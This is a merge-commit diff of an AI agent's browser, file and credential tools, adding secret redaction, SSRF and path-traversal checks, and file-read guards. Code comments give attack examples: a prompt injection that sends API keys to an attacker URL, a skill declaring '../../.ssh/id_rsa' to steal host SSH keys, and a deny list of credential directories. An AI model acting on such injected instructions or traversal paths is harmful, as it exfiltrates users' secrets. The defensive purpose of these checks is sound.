Merge branch 'main' into rewbs/tool-use-charge-to-subscription

2026-04-02 11:00:35 +11:00
parent 1b7473e702 bd9e0b605f
commit a2e56d044b
175 changed files with 18848 additions and 3772 deletions
--- a/tools/browser_camofox.py
+++ b/tools/browser_camofox.py
@@ -15,7 +15,7 @@ Setup::
    npm install && npm start   # downloads Camoufox (~300MB) on first run

    # Option 2: Docker
-    docker run -p 9377:9377 jo-inc/camofox-browser
+    docker run -p 9377:9377 -e CAMOFOX_PORT=9377 jo-inc/camofox-browser

 Then set ``CAMOFOX_URL=http://localhost:9377`` in ``~/.hermes/.env``.
 """
@@ -34,6 +34,9 @@ from typing import Any, Dict, Optional

 import requests

+from hermes_cli.config import load_config
+from tools.browser_camofox_state import get_camofox_identity
+
 logger = logging.getLogger(__name__)

 # ---------------------------------------------------------------------------
@@ -42,6 +45,8 @@ logger = logging.getLogger(__name__)

 _DEFAULT_TIMEOUT = 30  # seconds per HTTP request
 _SNAPSHOT_MAX_CHARS = 80_000  # camofox paginates at this limit
+_vnc_url: Optional[str] = None  # cached from /health response
+_vnc_url_checked = False  # set once /health has answered 200; no VNC re-probe after that


 def get_camofox_url() -> str:
@@ -56,16 +61,52 @@ def is_camofox_mode() -> bool:

 def check_camofox_available() -> bool:
    """Verify the Camofox server is reachable."""
+    global _vnc_url, _vnc_url_checked
    url = get_camofox_url()
    if not url:
        return False
    try:
        resp = requests.get(f"{url}/health", timeout=5)
+        if resp.status_code == 200 and not _vnc_url_checked:
+            try:
+                data = resp.json()  # may decode to any JSON type, not only an object
+                vnc_port = data.get("vncPort") if isinstance(data, dict) else None
+                if isinstance(vnc_port, int) and 1 <= vnc_port <= 65535:
+                    from urllib.parse import urlparse
+                    parsed = urlparse(url)
+                    host = parsed.hostname or "localhost"
+                    _vnc_url = f"http://{host}:{vnc_port}"  # API host, advertised VNC port
+            except (ValueError, KeyError):  # non-JSON body or unparsable URL: no VNC link
+                pass
+            _vnc_url_checked = True  # probe settled; later health checks skip it
        return resp.status_code == 200
    except Exception:
        return False


+def get_vnc_url() -> Optional[str]:
+    """Return the VNC URL if the Camofox server exposes one, or None."""
+    if not _vnc_url_checked:
+        check_camofox_available()
+    return _vnc_url
+
+
+def _managed_persistence_enabled() -> bool:
+    """Return whether Hermes-managed persistence is enabled for Camofox.
+
+    When enabled, sessions use a stable profile-scoped userId so the
+    Camofox server can map it to a persistent browser profile directory.
+    When disabled (default), each session gets a random userId (ephemeral).
+    An unreadable config or a malformed/null section counts as disabled.
+    Controlled by ``browser.camofox.managed_persistence`` in config.yaml.
+    """
+    try:
+        camofox_cfg = load_config().get("browser", {}).get("camofox", {})
+        return bool(camofox_cfg.get("managed_persistence"))  # in the try: a null ``camofox:`` key gives None
+    except Exception:
+        return False
+
+
 # ---------------------------------------------------------------------------
 # Session management
 # ---------------------------------------------------------------------------
@@ -75,16 +116,31 @@ _sessions_lock = threading.Lock()


 def _get_session(task_id: Optional[str]) -> Dict[str, Any]:
-    """Get or create a camofox session for the given task."""
+    """Get or create a camofox session for the given task.
+
+    When managed persistence is enabled, uses a deterministic userId
+    derived from the Hermes profile so the Camofox server can map it
+    to the same persistent browser profile across restarts.
+    """
    task_id = task_id or "default"
    with _sessions_lock:
        if task_id in _sessions:
            return _sessions[task_id]
-        session = {
-            "user_id": f"hermes_{uuid.uuid4().hex[:10]}",
-            "tab_id": None,
-            "session_key": f"task_{task_id[:16]}",
-        }
+        if _managed_persistence_enabled():
+            identity = get_camofox_identity(task_id)
+            session = {
+                "user_id": identity["user_id"],
+                "tab_id": None,
+                "session_key": identity["session_key"],
+                "managed": True,
+            }
+        else:
+            session = {
+                "user_id": f"hermes_{uuid.uuid4().hex[:10]}",
+                "tab_id": None,
+                "session_key": f"task_{task_id[:16]}",
+                "managed": False,
+            }
        _sessions[task_id] = session
        return session

@@ -172,11 +228,19 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
                {"userId": session["user_id"], "url": url},
                timeout=60,
            )
-        return json.dumps({
+        result = {
            "success": True,
            "url": data.get("url", url),
            "title": data.get("title", ""),
-        })
+        }
+        vnc = get_vnc_url()
+        if vnc:
+            result["vnc_url"] = vnc
+            result["vnc_hint"] = (
+                "Browser is visible via VNC. "
+                "Share this link with the user so they can watch the browser live."
+            )
+        return json.dumps(result)
    except requests.HTTPError as e:
        return json.dumps({"success": False, "error": f"Navigation failed: {e}"})
    except requests.ConnectionError:
@@ -184,7 +248,7 @@ def camofox_navigate(url: str, task_id: Optional[str] = None) -> str:
            "success": False,
            "error": f"Cannot connect to Camofox at {get_camofox_url()}. "
                     "Is the server running? Start with: npm start (in camofox-browser dir) "
-                     "or: docker run -p 9377:9377 jo-inc/camofox-browser",
+                     "or: docker run -p 9377:9377 -e CAMOFOX_PORT=9377 jo-inc/camofox-browser",
        })
    except Exception as e:
        return json.dumps({"success": False, "error": str(e)})
@@ -421,6 +485,12 @@ def camofox_vision(question: str, annotate: bool = False,
            except Exception:
                pass

+        # Redact secrets from annotation context before sending to vision LLM.
+        # The screenshot image itself cannot be redacted, but at least the
+        # text-based accessibility tree snippet won't leak secret values.
+        from agent.redact import redact_sensitive_text
+        annotation_context = redact_sensitive_text(annotation_context)
+
        # Send to vision LLM
        from agent.auxiliary_client import call_llm

@@ -436,7 +506,7 @@ def camofox_vision(question: str, annotate: bool = False,
        except Exception:
            _vision_timeout = 120

-        analysis = call_llm(
+        response = call_llm(
            messages=[{
                "role": "user",
                "content": [
@@ -452,6 +522,11 @@ def camofox_vision(question: str, annotate: bool = False,
            task="vision",
            timeout=_vision_timeout,
        )
+        analysis = (response.choices[0].message.content or "").strip() if response.choices else ""
+
+        # Redact secrets the vision LLM may have read from the screenshot.
+        from agent.redact import redact_sensitive_text
+        analysis = redact_sensitive_text(analysis)

        return json.dumps({
            "success": True,
--- a/tools/browser_camofox_state.py
+++ b/tools/browser_camofox_state.py
@@ -0,0 +1,47 @@
+"""Hermes-managed Camofox state helpers.
+
+Provides profile-scoped identity and state directory paths for Camofox
+persistent browser profiles.  When managed persistence is enabled, Hermes
+sends a deterministic userId derived from the active profile so that
+Camofox can map it to the same persistent browser profile directory
+across restarts.
+"""
+
+from __future__ import annotations
+
+import uuid
+from pathlib import Path
+from typing import Dict, Optional
+
+from hermes_constants import get_hermes_home
+
+CAMOFOX_STATE_DIR_NAME = "browser_auth"
+CAMOFOX_STATE_SUBDIR = "camofox"
+
+
+def get_camofox_state_dir() -> Path:
+    """Return the profile-scoped root directory for Camofox persistence."""
+    return get_hermes_home() / CAMOFOX_STATE_DIR_NAME / CAMOFOX_STATE_SUBDIR
+
+
+def get_camofox_identity(task_id: Optional[str] = None) -> Dict[str, str]:
+    """Return the stable Hermes-managed Camofox identity for this profile.
+
+    The user identity is profile-scoped (same Hermes profile = same userId).
+    The session key is scoped to the logical browser task so newly created
+    tabs within the same profile reuse the same identity contract.
+    """
+    scope_root = str(get_camofox_state_dir())
+    logical_scope = task_id or "default"
+    user_digest = uuid.uuid5(
+        uuid.NAMESPACE_URL,
+        f"camofox-user:{scope_root}",
+    ).hex[:10]
+    session_digest = uuid.uuid5(
+        uuid.NAMESPACE_URL,
+        f"camofox-session:{scope_root}:{logical_scope}",
+    ).hex[:16]
+    return {
+        "user_id": f"hermes_{user_digest}",
+        "session_key": f"task_{session_digest}",
+    }
--- a/tools/browser_tool.py
+++ b/tools/browser_tool.py
@@ -238,6 +238,8 @@ _PROVIDER_REGISTRY: Dict[str, type] = {

 _cached_cloud_provider: Optional[CloudBrowserProvider] = None
 _cloud_provider_resolved = False
+_allow_private_urls_resolved = False
+_cached_allow_private_urls: Optional[bool] = None


 def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
@@ -299,6 +301,44 @@ def _is_local_mode() -> bool:
    return _get_cloud_provider() is None


+def _is_local_backend() -> bool:
+    """Return True when the browser runs locally (no cloud provider).
+
+    SSRF protection is only meaningful for cloud backends (Browserbase,
+    BrowserUse) where the agent could reach internal resources on a remote
+    machine.  For local backends — Camofox, or the built-in headless
+    Chromium without a cloud provider — the user already has full terminal
+    and network access on the same machine, so the check adds no security
+    value.
+    """
+    return _is_camofox_mode() or _get_cloud_provider() is None
+
+
+def _allow_private_urls() -> bool:
+    """Return whether the browser is allowed to navigate to private/internal addresses.
+
+    Reads ``config["browser"]["allow_private_urls"]`` once and caches the result
+    for the process lifetime.  Defaults to ``False`` (SSRF protection active).
+    """
+    global _cached_allow_private_urls, _allow_private_urls_resolved
+    if _allow_private_urls_resolved:
+        return _cached_allow_private_urls
+
+    _allow_private_urls_resolved = True
+    _cached_allow_private_urls = False  # safe default
+    try:
+        hermes_home = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes"))
+        config_path = hermes_home / "config.yaml"
+        if config_path.exists():
+            import yaml
+            with open(config_path, encoding="utf-8") as f:  # explicit codec: don't depend on the locale
+                cfg = yaml.safe_load(f) or {}
+            _cached_allow_private_urls = bool(cfg.get("browser", {}).get("allow_private_urls"))
+    except Exception as e:
+        logger.debug("Could not read allow_private_urls from config: %s", e)
+    return _cached_allow_private_urls
+
+
 def _socket_safe_tmpdir() -> str:
    """Return a short temp directory path suitable for Unix domain sockets.

@@ -1024,6 +1064,13 @@ def _extract_relevant_content(
            f"Provide a concise summary focused on interactive elements and key content."
        )

+    # Redact secrets from snapshot before sending to auxiliary LLM.
+    # Without this, a page displaying env vars or API keys would leak
+    # secrets to the extraction model before run_agent.py's general
+    # redaction layer ever sees the tool result.
+    from agent.redact import redact_sensitive_text
+    extraction_prompt = redact_sensitive_text(extraction_prompt)
+
    try:
        call_kwargs = {
            "task": "web_extract",
@@ -1035,7 +1082,9 @@ def _extract_relevant_content(
        if model:
            call_kwargs["model"] = model
        response = call_llm(**call_kwargs)
-        return (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
+        extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
+        # Redact any secrets the auxiliary LLM may have echoed back.
+        return redact_sensitive_text(extracted)
    except Exception:
        return _truncate_snapshot(snapshot_text)

@@ -1072,8 +1121,23 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
    Returns:
        JSON string with navigation result (includes stealth features info on first nav)
    """
-    # SSRF protection — block private/internal addresses before navigating
-    if not _is_safe_url(url):
+    # Secret exfiltration protection — block URLs that embed API keys or
+    # tokens in query parameters. A prompt injection could trick the agent
+    # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
+    from agent.redact import _PREFIX_RE
+    if _PREFIX_RE.search(url):
+        return json.dumps({
+            "success": False,
+            "error": "Blocked: URL contains what appears to be an API key or token. "
+                     "Secrets must not be sent in URLs.",
+        })
+
+    # SSRF protection — block private/internal addresses before navigating.
+    # Skipped for local backends (Camofox, headless Chromium without a cloud
+    # provider) because the agent already has full local network access via
+    # the terminal tool.  Can also be opted out for cloud mode via
+    # ``browser.allow_private_urls`` in config.
+    if not _is_local_backend() and not _allow_private_urls() and not _is_safe_url(url):
        return json.dumps({
            "success": False,
            "error": "Blocked: URL targets a private or internal address",
@@ -1115,7 +1179,8 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
        # Post-redirect SSRF check — if the browser followed a redirect to a
        # private/internal address, block the result so the model can't read
        # internal content via subsequent browser_snapshot calls.
-        if final_url and final_url != url and not _is_safe_url(final_url):
+        # Skipped for local backends (same rationale as the pre-nav check).
+        if not _is_local_backend() and not _allow_private_urls() and final_url and final_url != url and not _is_safe_url(final_url):
            # Navigate away to a blank page to prevent snapshot leaks
            _run_browser_command(effective_task_id, "open", ["about:blank"], timeout=10)
            return json.dumps({
@@ -1711,6 +1776,9 @@ def browser_vision(question: str, annotate: bool = False, task_id: Optional[str]
        response = call_llm(**call_kwargs)
        
        analysis = (response.choices[0].message.content or "").strip()
+        # Redact secrets the vision LLM may have read from the screenshot.
+        from agent.redact import redact_sensitive_text
+        analysis = redact_sensitive_text(analysis)
        response_data = {
            "success": True,
            "analysis": analysis or "Vision analysis returned no content.",
--- a/tools/code_execution_tool.py
+++ b/tools/code_execution_tool.py
@@ -596,6 +596,14 @@ def execute_code(
        stdout_text = strip_ansi(stdout_text)
        stderr_text = strip_ansi(stderr_text)

+        # Redact secrets (API keys, tokens, etc.) from sandbox output.
+        # The sandbox env-var filter (lines 434-454) blocks os.environ access,
+        # but scripts can still read secrets from disk (e.g. open('~/.hermes/.env')).
+        # This ensures leaked secrets never enter the model context.
+        from agent.redact import redact_sensitive_text
+        stdout_text = redact_sensitive_text(stdout_text)
+        stderr_text = redact_sensitive_text(stderr_text)
+
        # Build response
        result: Dict[str, Any] = {
            "status": status,
--- a/tools/credential_files.py
+++ b/tools/credential_files.py
@@ -55,16 +55,47 @@ def register_credential_file(

    *relative_path* is relative to ``HERMES_HOME`` (e.g. ``google_token.json``).
    Returns True if the file exists on the host and was registered.
+
+    Security: rejects absolute paths and path traversal sequences (``..``).
+    The resolved host path must remain inside HERMES_HOME so that a malicious
+    skill cannot declare ``required_credential_files: ['../../.ssh/id_rsa']``
+    and exfiltrate sensitive host files into a container sandbox.
    """
    hermes_home = _resolve_hermes_home()
+
+    # Reject absolute paths — they bypass the HERMES_HOME sandbox entirely.
+    if os.path.isabs(relative_path):
+        logger.warning(
+            "credential_files: rejected absolute path %r (must be relative to HERMES_HOME)",
+            relative_path,
+        )
+        return False
+
    host_path = hermes_home / relative_path
-    if not host_path.is_file():
-        logger.debug("credential_files: skipping %s (not found)", host_path)
+
+    # Resolve symlinks and normalise ``..`` before the containment check so
+    # that traversal like ``../.ssh/id_rsa`` cannot escape HERMES_HOME.
+    try:
+        resolved = host_path.resolve()
+        hermes_home_resolved = hermes_home.resolve()
+        resolved.relative_to(hermes_home_resolved)  # raises ValueError if outside
+    except ValueError:
+        logger.warning(
+            "credential_files: rejected path traversal %r "
+            "(resolves to %s, outside HERMES_HOME %s)",
+            relative_path,
+            resolved,
+            hermes_home_resolved,
+        )
+        return False
+
+    if not resolved.is_file():
+        logger.debug("credential_files: skipping %s (not found)", resolved)
        return False

    container_path = f"{container_base.rstrip('/')}/{relative_path}"
-    _registered_files[container_path] = str(host_path)
-    logger.debug("credential_files: registered %s -> %s", host_path, container_path)
+    _registered_files[container_path] = str(resolved)
+    logger.debug("credential_files: registered %s -> %s", resolved, container_path)
    return True


@@ -110,11 +141,27 @@ def _load_config_files() -> List[Dict[str, str]]:
                cfg = yaml.safe_load(f) or {}
            cred_files = cfg.get("terminal", {}).get("credential_files")
            if isinstance(cred_files, list):
+                hermes_home_resolved = hermes_home.resolve()
                for item in cred_files:
                    if isinstance(item, str) and item.strip():
-                        host_path = hermes_home / item.strip()
+                        rel = item.strip()
+                        if os.path.isabs(rel):
+                            logger.warning(
+                                "credential_files: rejected absolute config path %r", rel,
+                            )
+                            continue
+                        host_path = (hermes_home / rel).resolve()
+                        try:
+                            host_path.relative_to(hermes_home_resolved)
+                        except ValueError:
+                            logger.warning(
+                                "credential_files: rejected config path traversal %r "
+                                "(resolves to %s, outside HERMES_HOME %s)",
+                                rel, host_path, hermes_home_resolved,
+                            )
+                            continue
                        if host_path.is_file():
-                            container_path = f"/root/.hermes/{item.strip()}"
+                            container_path = f"/root/.hermes/{rel}"
                            result.append({
                                "host_path": str(host_path),
                                "container_path": container_path,
--- a/tools/file_operations.py
+++ b/tools/file_operations.py
@@ -71,6 +71,9 @@ WRITE_DENIED_PREFIXES = [
        os.path.join(_HOME, ".kube"),
        "/etc/sudoers.d",
        "/etc/systemd",
+        os.path.join(_HOME, ".docker"),
+        os.path.join(_HOME, ".azure"),
+        os.path.join(_HOME, ".config", "gh"),
    ]
 ]

--- a/tools/file_tools.py
+++ b/tools/file_tools.py
@@ -15,6 +15,80 @@ logger = logging.getLogger(__name__)

 _EXPECTED_WRITE_ERRNOS = {errno.EACCES, errno.EPERM, errno.EROFS}

+# ---------------------------------------------------------------------------
+# Read-size guard: cap the character count returned to the model.
+# We're model-agnostic so we can't count tokens; characters are a safe proxy.
+# 100K chars ≈ 25–35K tokens across typical tokenisers.  Files larger than
+# this in a single read are a context-window hazard — the model should use
+# offset+limit to read the relevant section.
+#
+# Configurable via config.yaml:  file_read_max_chars: 200000
+# ---------------------------------------------------------------------------
+_DEFAULT_MAX_READ_CHARS = 100_000
+_max_read_chars_cached: int | None = None
+
+
+def _get_max_read_chars() -> int:
+    """Return the configured max characters per file read.
+
+    Reads ``file_read_max_chars`` from config.yaml on first call, caches
+    the result for the lifetime of the process.  Falls back to the built-in
+    default if the config is missing or invalid (non-numeric, bool, or < 1).
+    """
+    global _max_read_chars_cached
+    if _max_read_chars_cached is not None:
+        return _max_read_chars_cached
+    try:
+        from hermes_cli.config import load_config
+        cfg = load_config()
+        val = cfg.get("file_read_max_chars")
+        if isinstance(val, (int, float)) and not isinstance(val, bool) and val >= 1:
+            _max_read_chars_cached = int(val)
+            return _max_read_chars_cached
+    except Exception:
+        pass  # best-effort: any config failure means "use the default"
+    _max_read_chars_cached = _DEFAULT_MAX_READ_CHARS
+    return _max_read_chars_cached
+
+# If the total file size exceeds this, the caller asked for a wide window
+# (limit > 200), and the read was truncated, we include a hint encouraging targeted reads.
+_LARGE_FILE_HINT_BYTES = 512_000  # 512 KB
+
+# ---------------------------------------------------------------------------
+# Device path blocklist — reading these hangs the process (infinite output
+# or blocking on input).  Checked by path only (no I/O).
+# ---------------------------------------------------------------------------
+_BLOCKED_DEVICE_PATHS = frozenset({
+    # Infinite output — never reach EOF
+    "/dev/zero", "/dev/random", "/dev/urandom", "/dev/full",
+    # Blocks waiting for input
+    "/dev/stdin", "/dev/tty", "/dev/console",
+    # Nonsensical to read
+    "/dev/stdout", "/dev/stderr",
+    # fd aliases
+    "/dev/fd/0", "/dev/fd/1", "/dev/fd/2",
+})
+
+
+def _is_blocked_device(filepath: str) -> bool:
+    """Return True if the path would hang the process (infinite output or blocking input).
+
+    Matches the lexically normalised path — no symlink resolution — because
+    the model specifies paths directly and realpath follows symlinks all the
+    way through (e.g. /dev/stdin → /proc/self/fd/0 → /dev/pts/0), defeating
+    the check.
+    """
+    import posixpath  # device paths are POSIX-style regardless of the host OS
+    # Text-only clean-up so spellings like /dev/./zero or /dev/../dev/zero still match; no I/O.
+    normalized = posixpath.normpath(os.path.expanduser(filepath))
+    if normalized in _BLOCKED_DEVICE_PATHS:
+        return True
+    # /proc/self/fd/0-2 and /proc/<pid>/fd/0-2 are Linux aliases for stdio
+    return normalized.startswith("/proc/") and normalized.endswith(
+        ("/fd/0", "/fd/1", "/fd/2")
+    )
+
+
 # Paths that file tools should refuse to write to without going through the
 # terminal tool's approval system.  These match prefixes after os.path.realpath.
 _SENSITIVE_PATH_PREFIXES = ("/etc/", "/boot/", "/usr/lib/systemd/")
@@ -53,11 +127,21 @@ def _is_expected_write_exception(exc: Exception) -> bool:
 _file_ops_lock = threading.Lock()
 _file_ops_cache: dict = {}

-# Track files read per task to detect re-read loops after context compression.
+# Track files read per task to detect re-read loops and deduplicate reads.
 # Per task_id we store:
 #   "last_key":     the key of the most recent read/search call (or None)
 #   "consecutive":  how many times that exact call has been repeated in a row
 #   "read_history": set of (path, offset, limit) tuples for get_read_files_summary
+#   "dedup":        dict mapping (resolved_path, offset, limit) → mtime float
+#                   Used to skip re-reads of unchanged files.  Reset on
+#                   context compression (the original content is summarised
+#                   away so the model needs the full content again).
+#   "read_timestamps": dict mapping resolved_path → modification-time float
+#                      recorded when the file was last read (or written) by
+#                      this task.  Used by write_file and patch to detect
+#                      external changes between the agent's read and write.
+#                      Updated after successful writes so consecutive edits
+#                      by the same task don't trigger false warnings.
 _read_tracker_lock = threading.Lock()
 _read_tracker: dict = {}

@@ -195,8 +279,19 @@ def clear_file_ops_cache(task_id: str = None):
 def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str = "default") -> str:
    """Read a file with pagination and line numbers."""
    try:
-        # Security: block direct reads of internal Hermes cache/index files
-        # to prevent prompt injection via catalog or hub metadata files.
+        # ── Device path guard ─────────────────────────────────────────
+        # Block paths that would hang the process (infinite output,
+        # blocking on input).  Pure path check — no I/O.
+        if _is_blocked_device(path):
+            return json.dumps({
+                "error": (
+                    f"Cannot read '{path}': this is a device file that would "
+                    "block or produce infinite output."
+                ),
+            })
+
+        # ── Hermes internal path guard ────────────────────────────────
+        # Prevent prompt injection via catalog or hub metadata files.
        import pathlib as _pathlib
        from hermes_constants import get_hermes_home as _get_hh
        _resolved = _pathlib.Path(path).expanduser().resolve()
@@ -217,20 +312,83 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
                })
            except ValueError:
                pass
+
+        # ── Dedup check ───────────────────────────────────────────────
+        # If we already read this exact (path, offset, limit) and the
+        # file hasn't been modified since, return a lightweight stub
+        # instead of re-sending the same content.  Saves context tokens.
+        resolved_str = str(_resolved)
+        dedup_key = (resolved_str, offset, limit)
+        with _read_tracker_lock:
+            task_data = _read_tracker.setdefault(task_id, {
+                "last_key": None, "consecutive": 0,
+                "read_history": set(), "dedup": {},
+            })
+            cached_mtime = task_data.get("dedup", {}).get(dedup_key)
+
+        if cached_mtime is not None:
+            try:
+                current_mtime = os.path.getmtime(resolved_str)
+                if current_mtime == cached_mtime:
+                    return json.dumps({
+                        "content": (
+                            "File unchanged since last read. The content from "
+                            "the earlier read_file result in this conversation is "
+                            "still current — refer to that instead of re-reading."
+                        ),
+                        "path": path,
+                        "dedup": True,
+                    }, ensure_ascii=False)
+            except OSError:
+                pass  # stat failed — fall through to full read
+
+        # ── Perform the read ──────────────────────────────────────────
        file_ops = _get_file_ops(task_id)
        result = file_ops.read_file(path, offset, limit)
        if result.content:
            result.content = redact_sensitive_text(result.content)
        result_dict = result.to_dict()

-        # Track reads to detect *consecutive* re-read loops.
-        # The counter resets whenever any other tool is called in between,
-        # so only truly back-to-back identical reads trigger warnings/blocks.
+        # ── Character-count guard ─────────────────────────────────────
+        # We're model-agnostic so we can't count tokens; characters are
+        # the best proxy we have.  If the read produced an unreasonable
+        # amount of content, reject it and tell the model to narrow down.
+        # Note: we check the formatted content (with line-number prefixes),
+        # not the raw file size, because that's what actually enters context.
+        content_len = len(result.content or "")
+        file_size = result_dict.get("file_size", 0)
+        max_chars = _get_max_read_chars()
+        if content_len > max_chars:
+            total_lines = result_dict.get("total_lines", "unknown")
+            return json.dumps({
+                "error": (
+                    f"Read produced {content_len:,} characters which exceeds "
+                    f"the safety limit ({max_chars:,} chars). "
+                    "Use offset and limit to read a smaller range. "
+                    f"The file has {total_lines} lines total."
+                ),
+                "path": path,
+                "total_lines": total_lines,
+                "file_size": file_size,
+            }, ensure_ascii=False)
+
+        # Large-file hint: if the file is big and the caller didn't ask
+        # for a narrow window, nudge toward targeted reads.
+        if (file_size and file_size > _LARGE_FILE_HINT_BYTES
+                and limit > 200
+                and result_dict.get("truncated")):
+            result_dict.setdefault("_hint", (
+                f"This file is large ({file_size:,} bytes). "
+                "Consider reading only the section you need with offset and limit "
+                "to keep context usage efficient."
+            ))
+
+        # ── Track for consecutive-loop detection ──────────────────────
        read_key = ("read", path, offset, limit)
        with _read_tracker_lock:
-            task_data = _read_tracker.setdefault(task_id, {
-                "last_key": None, "consecutive": 0, "read_history": set(),
-            })
+            # Ensure "dedup" key exists (backward compat with old tracker state)
+            if "dedup" not in task_data:
+                task_data["dedup"] = {}
            task_data["read_history"].add((path, offset, limit))
            if task_data["last_key"] == read_key:
                task_data["consecutive"] += 1
@@ -239,6 +397,17 @@ def read_file_tool(path: str, offset: int = 1, limit: int = 500, task_id: str =
                task_data["consecutive"] = 1
            count = task_data["consecutive"]

+            # Store mtime at read time for two purposes:
+            # 1. Dedup: skip identical re-reads of unchanged files.
+            # 2. Staleness: warn on write/patch if the file changed since
+            #    the agent last read it (external edit, concurrent agent, etc.).
+            try:
+                _mtime_now = os.path.getmtime(resolved_str)
+                task_data["dedup"][dedup_key] = _mtime_now
+                task_data.setdefault("read_timestamps", {})[resolved_str] = _mtime_now
+            except OSError:
+                pass  # Can't stat — skip tracking for this entry
+
        if count >= 4:
            # Hard block: stop returning content to break the loop
            return json.dumps({
@@ -296,6 +465,28 @@ def clear_read_tracker(task_id: str = None):
            _read_tracker.clear()


+def reset_file_dedup(task_id: str = None):
+    """Forget the per-file read-dedup entries held by the read tracker.
+
+    Intended for use after context compression: once earlier read output
+    has been summarised out of the conversation, a "file unchanged" stub
+    would refer to text the model can no longer see, so the next read of
+    the same file must return its full content again.
+
+    A truthy ``task_id`` empties only that task's ``"dedup"`` mapping; a
+    falsy one (the default) empties the mapping of every tracked task.
+    """
+    with _read_tracker_lock:
+        if task_id:
+            entry = _read_tracker.get(task_id)
+            targets = [entry] if entry else []
+        else:
+            targets = list(_read_tracker.values())
+        for entry in targets:
+            if "dedup" in entry:
+                entry["dedup"].clear()
+
+
 def notify_other_tool_call(task_id: str = "default"):
    """Reset consecutive read/search counter for a task.

@@ -312,15 +503,71 @@ def notify_other_tool_call(task_id: str = "default"):
            task_data["consecutive"] = 0


+def _update_read_timestamp(filepath: str, task_id: str) -> None:
+    """Store the file's current mtime as this task's last-seen timestamp.
+
+    Used after write_file/patch so that the task's own edit is not later
+    reported as a stale read by the staleness check.
+    """
+    try:
+        abs_path = str(Path(filepath).expanduser().resolve())
+        mtime_now = os.path.getmtime(abs_path)
+    except (OSError, ValueError):
+        return  # path cannot be resolved or stat'ed; nothing to record
+    with _read_tracker_lock:
+        entry = _read_tracker.get(task_id)
+        if entry is None:
+            return  # task has no tracker entry; one is not created here
+        entry.setdefault("read_timestamps", {})[abs_path] = mtime_now
+
+
+def _check_file_staleness(filepath: str, task_id: str) -> str | None:
+    """Compare a file's current mtime with the one recorded for this task.
+
+    Returns a human-readable warning when the mtimes differ, i.e. the file
+    changed after the timestamp this task last recorded for it.  ``None``
+    is returned when the path cannot be resolved or stat'ed, when the task
+    has no recorded timestamp for it, or when the mtimes match.  This is
+    advisory only: nothing here prevents the caller from writing.
+    """
+    try:
+        abs_path = str(Path(filepath).expanduser().resolve())
+    except (OSError, ValueError):
+        return None
+    with _read_tracker_lock:
+        entry = _read_tracker.get(task_id) or {}
+        seen_mtime = entry.get("read_timestamps", {}).get(abs_path)
+    if seen_mtime is None:
+        return None  # no tracker entry, or no timestamp recorded for this path
+    try:
+        unchanged = os.path.getmtime(abs_path) == seen_mtime
+    except OSError:
+        return None  # cannot stat (perhaps deleted); leave it to the write itself
+    if unchanged:
+        return None
+    return (
+        f"Warning: {filepath} was modified since you last read it "
+        "(external edit or concurrent agent). The content you read may be "
+        "stale. Consider re-reading the file to verify before writing."
+    )
+
+
 def write_file_tool(path: str, content: str, task_id: str = "default") -> str:
    """Write content to a file."""
    sensitive_err = _check_sensitive_path(path)
    if sensitive_err:
        return json.dumps({"error": sensitive_err}, ensure_ascii=False)
    try:
+        stale_warning = _check_file_staleness(path, task_id)
        file_ops = _get_file_ops(task_id)
        result = file_ops.write_file(path, content)
-        return json.dumps(result.to_dict(), ensure_ascii=False)
+        result_dict = result.to_dict()
+        if stale_warning:
+            result_dict["_warning"] = stale_warning
+        # Refresh the stored timestamp so consecutive writes by this
+        # task don't trigger false staleness warnings.
+        _update_read_timestamp(path, task_id)
+        return json.dumps(result_dict, ensure_ascii=False)
    except Exception as e:
        if _is_expected_write_exception(e):
            logger.debug("write_file expected denial: %s: %s", type(e).__name__, e)
@@ -346,6 +593,13 @@ def patch_tool(mode: str = "replace", path: str = None, old_string: str = None,
        if sensitive_err:
            return json.dumps({"error": sensitive_err}, ensure_ascii=False)
    try:
+        # Check staleness for all files this patch will touch.
+        stale_warnings = []
+        for _p in _paths_to_check:
+            _sw = _check_file_staleness(_p, task_id)
+            if _sw:
+                stale_warnings.append(_sw)
+
        file_ops = _get_file_ops(task_id)
        
        if mode == "replace":
@@ -362,6 +616,13 @@ def patch_tool(mode: str = "replace", path: str = None, old_string: str = None,
            return json.dumps({"error": f"Unknown mode: {mode}"})
        
        result_dict = result.to_dict()
+        if stale_warnings:
+            result_dict["_warning"] = stale_warnings[0] if len(stale_warnings) == 1 else " | ".join(stale_warnings)
+        # Refresh stored timestamps for all successfully-patched paths so
+        # consecutive edits by this task don't trigger false warnings.
+        if not result_dict.get("error"):
+            for _p in _paths_to_check:
+                _update_read_timestamp(_p, task_id)
        result_json = json.dumps(result_dict, ensure_ascii=False)
        # Hint when old_string not found — saves iterations where the agent
        # retries with stale content instead of re-reading the file.
@@ -466,7 +727,7 @@ def _check_file_reqs():

 READ_FILE_SCHEMA = {
    "name": "read_file",
-    "description": "Read a text file with line numbers and pagination. Use this instead of cat/head/tail in terminal. Output format: 'LINE_NUM|CONTENT'. Suggests similar filenames if not found. Use offset and limit for large files. NOTE: Cannot read images or binary files — use vision_analyze for images.",
+    "description": "Read a text file with line numbers and pagination. Use this instead of cat/head/tail in terminal. Output format: 'LINE_NUM|CONTENT'. Suggests similar filenames if not found. Use offset and limit for large files. Reads exceeding ~100K characters are rejected; use offset and limit to read specific sections of large files. NOTE: Cannot read images or binary files — use vision_analyze for images.",
    "parameters": {
        "type": "object",
        "properties": {
--- a/tools/skill_manager_tool.py
+++ b/tools/skill_manager_tool.py
@@ -82,6 +82,8 @@ SKILLS_DIR = HERMES_HOME / "skills"

 MAX_NAME_LENGTH = 64
 MAX_DESCRIPTION_LENGTH = 1024
+MAX_SKILL_CONTENT_CHARS = 100_000   # ~36k tokens at 2.75 chars/token
+MAX_SKILL_FILE_BYTES = 1_048_576    # 1 MiB per supporting file

 # Characters allowed in skill names (filesystem-safe, URL-friendly)
 VALID_NAME_RE = re.compile(r'^[a-z0-9][a-z0-9._-]*$')
@@ -177,6 +179,21 @@ def _validate_frontmatter(content: str) -> Optional[str]:
    return None


